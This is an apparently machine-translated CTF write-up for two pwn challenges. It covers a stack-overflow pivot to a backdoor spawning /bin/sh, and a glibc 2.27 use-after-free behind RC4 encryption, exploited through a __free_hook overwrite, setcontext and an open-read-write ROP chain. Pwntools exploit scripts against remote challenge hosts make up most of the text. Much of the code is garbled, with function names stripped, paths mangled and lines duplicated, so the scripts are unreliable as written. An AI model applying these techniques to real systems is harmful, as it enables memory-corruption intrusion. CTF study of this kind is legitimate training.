pwn2
The opening leaks the stack address, another stack overflow, and a direct stack transfer takes the
from pwn import *
from LibcSearcher import LibcSearcher
#from import bytes_to_long,bytes_to_long
#--------------------setting context---------------------
(arch='amd64', os='linux', log_level='debug')
li = lambda content,data : print('\x1b[01;38;5;214m' + content + ' = ' + hex(data) + '\x1b[0m')
lg = lambda content : print('\x1b[01;38;5;214m' + content + '\x1b[0m')
sla = lambda data, content: (data,content)
sa = lambda data, content: (data,content)
sl = lambda data: (data)
rl = lambda data: (data)
re = lambda data: (data)
sa = lambda data, content: (data,content)
dbg = lambda : (io)
bk = lambda : (dbg(),pause())
inter = lambda: ()
l64 = lambda :u64((b'\x7f')[-6:].ljust(8,b'\x00'))
h64=lambda :u64((6).ljust(8,b'\x00'))
add=0
orw_shellcode = asm(('flag') + (3, add, 0x30) + (1,add, 0x30))
def dbg(c = 0).
if(c).
(io, c)
pause()
else: (io)
(io)
pause()
#---------------------------------------------------------
filename = ". /short"
#io = process(filename)
io = remote("0192d60ff4427dff9e9f1e7ecaacbc14.diu4.",46513)
elf = ELF(filename)
libc=ELF("/lib/i386-linux-gnu/.6")
#Initialization complete ---------------------------------------------------------\
sla(b':',b'admin')
sla(b':',b'admin123')
rl(b'this:')
s=(11)
print(s)
badd=int(s,16)
print(hex(badd))
backdoor=0x80485ff
#payload=b'/bin/sh\x00'+b'a'*68+b'a'*4+p32(()+0x100)+p32(0x8048662)
payload=(p32(backdoor)*2+p32(badd+8+4)+b'/bin/sh\x00').ljust(0x50,b'a')+p32(badd)+p32(0x804860F)
#dbg()
sa(b'plz input your msg:',payload)
inter()
pwn4
The beginning of the card an account password, is unknown, but according to the return can determine the length, and finally write a random string blasting algorithm to blast out the
For the heap question in 2.27, the vulnerability point is uaf, but this heap question wraps an rc4 encryption
rc4 is essentially iso or character, twice rc4 can be restored to the original, the audit found that add function will be encrypted once, and then show will be encrypted to restore once, and then show after encrypted, free function will be encrypted all the contents of the once, the edit function also will be
Therefore, after we free off, in the debugging is not encrypted, but show function out of the encrypted, so the leakage of the address is received when the ciphertext, we directly rc4 once on it, there are also subsequent uaf modification also need to go ahead to deal with the
Tear that wrapping off and behind it is uaf leaking the address then changing the freehook then orw
The exp is as follows
from pwn import *
#from import bytes_to_long,bytes_to_long
#--------------------setting context---------------------
(arch='amd64', os='linux', log_level='debug')
li = lambda content,data : print('\x1b[01;38;5;214m' + content + ' = ' + hex(data) + '\x1b[0m')
lg = lambda content : print('\x1b[01;38;5;214m' + content + '\x1b[0m')
sla = lambda data, content: (data,content)
sa = lambda data, content: (data,content)
sl = lambda data: (data)
rl = lambda data: (data)
re = lambda data: (data)
sa = lambda data, content: (data,content)
dbg = lambda : (io)
bk = lambda : (dbg(),pause())
inter = lambda: ()
l64 = lambda :u64((b'\x7f')[-6:].ljust(8,b'\x00'))
h64=lambda :u64((6).ljust(8,b'\x00'))
add=0
orw_shellcode = asm(('flag') + (3, add, 0x30) + (1,add, 0x30))
def dbg(c = 0).
if(c).
(io, c)
pause()
else: (io)
(io)
pause()
#---------------------------------------------------------
filename = ". /pwn"
#io = process(filename)
io = remote("0192d73de23d7e60b2db8af8f087fcb7.srv9.",44909)
#elf = ELF(filename)
libc=ELF(". /.6")
#initialization done ---------------------------------------------------------\
def add(size,index,payload).
sla(b'>',b'1')
sla(b':',str(index))
sla(b':',str(size))
sa(b':',payload)
def free(index).
sla(b'>',b'3')
sla(b':',str(index))
def show(index).
sla(b'>',b'2')
sla(b':',str(index))
def edit(index,payload): sla(b'>',b'2')
sla(b'>',b'4')
sla(b':',str(index))
sa(b':',payload)
#rc4
def KSA(key).
""" Key-Scheduling Algorithm (KSA) """
S = list(range(256))
j = 0
for i in range(256).
j = (j + S[i] + key[i % len(key)]) % 256
S[i], S[j] = S[j], S[i]
return S
def PRGA(S).
""" Pseudo-Random Generation Algorithm (PRGA) """
i, j = 0, 0
while True: i = (i + 1)
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
K = S[(S[i] + S[j]) % 256]
yield K
def RC4(key, text).
""" RC4 encryption/decryption """
S = KSA(key)
keystream = PRGA(S)
res = []
for char in text.
(char ^ next(keystream))
return bytes(res)
sla(b'Input your username:',b'4dm1n')
sla(b'Input your password:',b'985da4f8cb37zkj')
for i in range(8): add(0x120,i,i,i)
add(0x120,i,b'aaaa\n')
add(0x120,8,b'aaaa\n')
for i in range(7): free(i)
add(0x120,8,b'aaaa\n')
add(0x120,i,b'aaaa\n')
show(7)
#show(7)
#leak libc
rl(b'[key,value] = [7,')
add2=(b'Encrypt')[0:-9]
print(add2)
key = b's4cur1ty_p4ssw0rd'
ciphertext = RC4(key, add2)
print(ciphertext[0:8])
libcbase=u64(ciphertext[0:8])-0x3ebca0
#add=h64()
lg(hex(libcbase))
#dbg()
#leak heap
show(6)
rl(b'[key,value] = [6,')
add2=(b'Encrypt')[0:-9]
print(add2)
key = b's4cur1ty_p4ssw0rd'
ciphertext = RC4(key, add2)
print(ciphertext[0:8])
heapbase = u64(ciphertext[0:8])
lg(hex(heapbase))
#hacker free_hook
free_hook=libcbase+['__free_hook']
lg(hex(free_hook))
free_hook = f"{free_hook:x}".zfill(16)
free_hook = (free_hook)
free_hook = free_hook[::-1]
#setcont=libcbase+['setcontent']+61
key = b's4cur1ty_p4ssw0rd'
efree = RC4(key, free_hook)
edit(6,efree+b'\n')
add(0x120,9,b'aaaaa\n')
#dbg()
setcontext=libcbase+['setcontext']+53
lg(hex(setcontext))
setcontext = f"{setcontext:x}".zfill(16)
setcontext=(setcontext)
setcontext = setcontext[::-1]
efree = RC4(key, setcontext)
add(0x120,0,efree+b'\n')
# Calculate ROP gadgets and function addresses
pop_rdi = libcbase +0x000000000002164f
pop_rsi = libcbase + 0x0000000000023a6a
pop_rdx = libcbase + 0x0000000000130539
read_addr = libcbase + ['read']
puts_addr = libcbase+ ['puts']
open_addr = libcbase+ ['open']
ret = libcbase+0x00000000000008aa
# Build the ROP chain
orw1 = (
p64(pop_rdi) + p64(heapbase+0x478) + # open
p64(pop_rsi) + p64(0) + # open
p64(open_addr)+
p64(pop_rdi) + p64(3) + # read
p64(pop_rsi) + p64(heapbase) + # read
p64(pop_rdx) + p64(0x30) + p64(heapbase) +
p64(read_addr) +
p64(pop_rdi) + p64(heapbase) + # puts
p64(puts_addr)
)
(0xa8,b'a')
orw1+=p64(heapbase+0x390)*5+p64(ret)*8+b'. /\x00'
# orw1+=p64(heapbase+0x390)*8+b'flag\x00'
# Convert to byte string and process
orw=p64(pop_rdi)
orw_hex = ().zfill(16) # use .hex() method directly
orw_bytes = (orw_hex)
# Encryption
efree = RC4(key, orw_bytes)
orw = p64(pop_rsi)
orw_hex = ().zfill(16) # use .hex() method directly
orw_bytes = (orw_hex)
efree += RC4(key, orw_bytes)
edit(8, orw1+b'\n')
#dbg()
free(8)
inter()
It's been a while since I've messed with 2.27 orw, I'm still using +61 for my setcontext and it's stuck for a bit